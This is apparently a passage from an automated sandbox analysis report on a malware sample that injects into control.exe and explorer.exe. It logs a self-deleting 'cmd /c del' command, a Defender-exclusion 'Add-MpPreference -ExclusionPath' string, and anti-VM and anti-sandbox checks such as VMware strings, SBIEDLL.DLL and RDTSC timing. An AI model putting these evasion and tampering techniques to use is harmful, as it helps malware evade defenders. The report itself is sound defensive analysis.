            Source: 3.2.iAuPyHuUkk.exe.bc0000.1.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.iAuPyHuUkk.exe.bc0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A42018 push ebx; retf
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D1450 push es; ret
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D14CD push es; iretd
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D3E6D push FFFFFF8Bh; iretd
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D3E76 push es; ret
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_064D1CE0 push eax; retf
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B832 push eax; ret
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B83B push eax; ret
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B89C push eax; ret
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C2A5 push dword ptr [A265E993h]; ret
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004154CF push es; iretd
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00413D9D push ecx; retf
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041B7E5 push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BED0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB89C push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB83B push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB832 push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C54CF push es; iretd
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C3D9D push ecx; retf
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CBDB1 push ecx; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CC6A5 push dword ptr [A265E993h]; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CB7E5 push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CBF1E push 00000015h; iretd
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CBF2F push es; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.86255981519

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.33e3150.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.34116cc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.370638895.00000000033C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: iAuPyHuUkk.exe PID: 476, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe TID: 580Thread sleep time: -32918s >= -30000s
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe TID: 5528Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\control.exe TID: 7072Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004088E0 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread delayed: delay time: 32918
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeThread delayed: delay time: 922337203685477
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.424615605.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.415338335.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000005.00000000.415338335.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
            Source: explorer.exe, 00000005.00000000.400888478.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000005.00000000.400888478.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000005.00000000.424615605.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004088E0 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C514FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C13884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C13884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C61074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C52073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C51C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C16C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C64015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C64015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B92D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C48DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C13540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B99100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C1A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C60EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C60EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C60EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C146A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C4B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BBAE73 mov eax, dword ptr fs:[00000030h]
